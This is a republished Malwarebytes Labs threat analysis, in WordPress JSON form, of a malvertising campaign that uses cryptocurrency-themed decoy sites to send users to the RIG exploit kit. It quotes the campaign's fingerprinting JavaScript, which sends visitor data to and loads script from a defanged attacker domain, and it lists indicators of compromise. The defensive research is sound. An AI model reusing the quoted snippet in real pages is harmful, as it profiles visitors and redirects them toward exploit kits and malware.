{"id":11624,"date":"2018-02-28T17:10:04","date_gmt":"2018-03-01T01:10:04","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/02\/28\/news-5395\/"},"modified":"2018-02-28T17:10:04","modified_gmt":"2018-03-01T01:10:04","slug":"news-5395","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2018\/02\/28\/news-5395\/","title":{"rendered":"RIG malvertising campaign uses cryptocurrency theme as decoy"},"content":{"rendered":"<p><strong>Credit to Author: J\u00e9r\u00f4me Segura| Date: Wed, 28 Feb 2018 16:45:10 +0000<\/strong><\/p>\n<p>For a couple of weeks, we have been observing a malvertising campaign that uses decoy websites to redirect users to the RIG exploit kit. Those sites, whose theme is about cryptocurrencies, were all registered recently and are swapped after a few days of use.<\/p>\n<p>The initial redirection starts off from a malvertising redirect, which loads the decoy page containing a third-party JavaScript. The JavaScript appears to be conditionally loaded based on the visitor&#8217;s user agent and geolocation.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"21924\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/02\/new-rig-malvertising-campaign-uses-cryptocurrency-theme-decoy\/attachment\/fingerprinting_call\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/fingerprinting_call.png\" data-orig-size=\"722,669\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"fingerprinting_call\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/fingerprinting_call-300x278.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/fingerprinting_call-600x556.png\" class=\"size-full wp-image-21924 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/fingerprinting_call.png\" alt=\"\" width=\"722\" height=\"669\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/fingerprinting_call.png 722w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/fingerprinting_call-300x278.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/fingerprinting_call-600x556.png 600w\" sizes=\"auto, (max-width: 722px) 100vw, 722px\" \/><\/p>\n<p>That JavaScript contains many different ways to fingerprint users and determine whether they are legitimate or not by validating some checks:<\/p>\n<ul>\n<li>getHasLiedLanguages<\/li>\n<li>getHasLiedResolution<\/li>\n<li>getHasLiedOS<\/li>\n<li>getHasLiedBrowser<\/li>\n<\/ul>\n<p>The results are then sent back to the server with the following code snippet:<\/p>\n<pre>\/\/botDetect.onUser(function () {  var fp = new Fingerprint2();  fp.get(function(result, components) {   var head = document.head || document.getElementsByTagName('head')[0];   var script = document.createElement('script');   script.type = 'text\/javascript';   script.src = 'http:\/\/binaryrobotplus[.]top\/rrr\/' + result;   head.appendChild(script);   iframePost('http:\/\/binaryrobotplus[.]top\/logs\/fff', {   fingerprintjs: JSON.stringify(components)   });<\/pre>\n<p>The final step consists of a response with a blurb containing an iframe to RIG EK:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"21925\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/02\/new-rig-malvertising-campaign-uses-cryptocurrency-theme-decoy\/attachment\/iframe_rig-2\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/iframe_RIG.png\" data-orig-size=\"789,132\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"iframe_RIG\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/iframe_RIG-300x50.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/iframe_RIG-600x100.png\" class=\"size-full wp-image-21925 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/iframe_RIG.png\" alt=\"\" width=\"789\" height=\"132\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/iframe_RIG.png 789w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/iframe_RIG-300x50.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/iframe_RIG-600x100.png 600w\" sizes=\"auto, (max-width: 789px) 100vw, 789px\" \/><\/p>\n<h3>Quiet campaign<\/h3>\n<p>So far, we have not collected many hits via this campaign. Because it was new to us, we decided to call it Coins LTD, based on the numerous references to cryptocurrencies in the decoy page.<\/p>\n<p>[Update] This campaign is also tracked as &#8216;etags&#8217;.<\/p>\n<pre>privateadult4you[.]club\/  -&gt; airmapanalytics[.]top\/iframe\/mapss.js  -&gt; ashlemainstreammm[.]club\/?q=w3_QMvXcJx7QFY{truncated}    Undocumented Injection (Stage 1) fake dating site   -&gt; privateadult4you[.]club 212.237.23[.]174  Etags Malicious Redirector (Stage 2)   -&gt; airmapanalytics.top 212.237.5[.]244  RIG EK Landing Page   -&gt; ashlemainstreammm[.]club 109.236.83[.]87  RIG EK Flash Object   -&gt; 185.158.112.49 RIG EK Flash Object    212.237.23[.]174 AS31034 | IT | ARUBA-ASN  212.237.5[.]244 AS31034 | IT | ARUBA-ASN  109.236.83[.]87 AS49981 | NL | WORLDSTREAM  185.158.112[.]49 AS44812 | UA | IPSERVER-RU-NET    ## Response Headers for Etags - airmapanalytics[.]top  X-Powered-By Express  Content-Type application\/javascript; charset=utf-8  Content-Length 332  ETag W\/\"14c-SUotFKLILwhh6umKmaC23SYcKJA\"  Date Mon, 08 May 2017 16:42:39 GMT  Connection keep-alive<\/pre>\n<p>Thanks to\u00a0<a href=\"https:\/\/twitter.com\/anti_expl0it\" target=\"_blank\" rel=\"noopener\">@anti_expl0it<\/a>\u00a0for the additional data.<\/p>\n<p>It is identical from infection to infection, and so far we have collected only two kinds of payloads: TrickBot and Ramnit.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/traffic.png\" data-rel=\"lightbox-0\" title=\"\"><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"21926\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/02\/new-rig-malvertising-campaign-uses-cryptocurrency-theme-decoy\/attachment\/traffic-19\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/traffic.png\" data-orig-size=\"732,323\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"traffic\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/traffic-300x132.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/traffic-600x265.png\" class=\"size-full wp-image-21926 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/traffic.png\" alt=\"\" width=\"732\" height=\"323\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/traffic.png 732w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/traffic-300x132.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/traffic-600x265.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/traffic-195x85.png 195w\" sizes=\"auto, (max-width: 732px) 100vw, 732px\" \/><\/a><\/p>\n<p>Other researchers, such as <a href=\"https:\/\/twitter.com\/baberpervez2\/status\/968849891442282501\" target=\"_blank\" rel=\"noopener\">Baber Pervez<\/a>, have caught this redirection chain as well, which recently slightly changed its URI pattern. However, the same\u00a0primary domain and secondary one (JS fingerprint) have been rotating and are hosted on two distinct IP addresses, as per the diagram below:<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/diagram_.png\" data-rel=\"lightbox-1\" title=\"\"><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"21930\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/02\/new-rig-malvertising-campaign-uses-cryptocurrency-theme-decoy\/attachment\/diagram_\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/diagram_.png\" data-orig-size=\"890,532\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"diagram_\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/diagram_-300x179.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/diagram_-600x359.png\" class=\"size-full wp-image-21930 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/diagram_.png\" alt=\"\" width=\"890\" height=\"532\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/diagram_.png 890w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/diagram_-300x179.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/diagram_-600x359.png 600w\" sizes=\"auto, (max-width: 890px) 100vw, 890px\" \/><\/a><\/p>\n<p>This is one of a handful of malvertising campaigns that we have been tracking. It&#8217;s worth noting how it also has similar filtering steps to avoid bots, and that it relies on a\u00a0<a href=\"http:\/\/www.nao-sec.org\/2017\/12\/survey-of-ngay-campaign.html\" target=\"_blank\" rel=\"noopener\">decoy gate<\/a>, which seems to be a common practice these days.<\/p>\n<p>We will keep tabs on this campaign\u2014in particular on what payloads it drops in the future. <a href=\"http:\/\/www.malwarebytes.com\/pricing\" target=\"_blank\" rel=\"noopener\">Malwarebytes<\/a> users are protected from this drive-by attack.<\/p>\n<h3>Indicators of compromise<\/h3>\n<p>IPs<\/p>\n<pre>5.135.234[.]116  212.237.12[.]253  137.74.159[.]216<\/pre>\n<p>Domains<\/p>\n<pre>cryptoearnings[.]xyz  mybinaryearns[.]top  protectforex[.]top  mymoneyfixing[.]top  investingtodayfix[.]top  profitablesoft[.]top  myearnmoneybin[.]top  coinsdouble[.]top  wowmoney[.]top  doublecoin[.]top  myrobotearn[.]top  earnthismoney[.]top  doitmoneyforyou[.]top  binaryearnforex[.]top  bitcoinrobotplus[.]top  binaryrobotplus[.]top  ocoins[.]xyz  upfixmoney[.]top<\/pre>\n<p>TrickBot<\/p>\n<pre>30de0e16924dddd4f162a25bbecb7f7ebc67a141140a245272a24951d0e81e1c<\/pre>\n<p>Ramnit<\/p>\n<pre>83dbde1705aa434e4c6cdae6a7d689abc4ad14ffcac26a10dbb5e96238d5b8e7<\/pre>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/02\/new-rig-malvertising-campaign-uses-cryptocurrency-theme-decoy\/\">RIG malvertising campaign uses cryptocurrency theme as decoy<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/02\/new-rig-malvertising-campaign-uses-cryptocurrency-theme-decoy\/\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: J\u00e9r\u00f4me Segura| Date: Wed, 28 Feb 2018 16:45:10 +0000<\/strong><\/p>\n<table cellpadding='10'>\n<tr>\n<td valign='top' align='center'><a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/02\/new-rig-malvertising-campaign-uses-cryptocurrency-theme-decoy\/' title='RIG malvertising campaign uses cryptocurrency theme as decoy'><img src='https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/02\/shutterstock_683817304.jpg' border='0'  width='300px'  \/><\/a><\/td>\n<\/tr>\n<tr>\n<td valign='top' align='left'>This malvertising campaign uses a popular cryptocurrency theme to redirect users to the RIG exploit kit.<\/p>\n<p>Categories: <\/p>\n<ul class=\"post-categories\">\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/exploits-threat-analysis\/\" rel=\"category tag\">Exploits<\/a><\/li>\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/\" rel=\"category tag\">Threat analysis<\/a><\/li>\n<\/ul>\n<p>Tags: <a href=\"https:\/\/blog.malwarebytes.com\/tag\/cryptocurrencies\/\" rel=\"tag\">cryptocurrencies<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/malvertising\/\" rel=\"tag\">malvertising<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/rig\/\" rel=\"tag\">RIG<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/rigek\/\" rel=\"tag\">RIGEK<\/a><\/p>\n<table width='100%'>\n<tr>\n<td align=right>\n<p><b>(<a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/02\/new-rig-malvertising-campaign-uses-cryptocurrency-theme-decoy\/' title='RIG malvertising campaign uses cryptocurrency theme as decoy'>Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/02\/new-rig-malvertising-campaign-uses-cryptocurrency-theme-decoy\/\">RIG malvertising campaign uses cryptocurrency theme as decoy<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[14147,10987,10531,11589,11692,10494],"class_list":["post-11624","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-cryptocurrencies","tag-exploits","tag-malvertising","tag-rig","tag-rigek","tag-threat-analysis"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11624","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11624"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11624\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11624"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11624"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11624"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}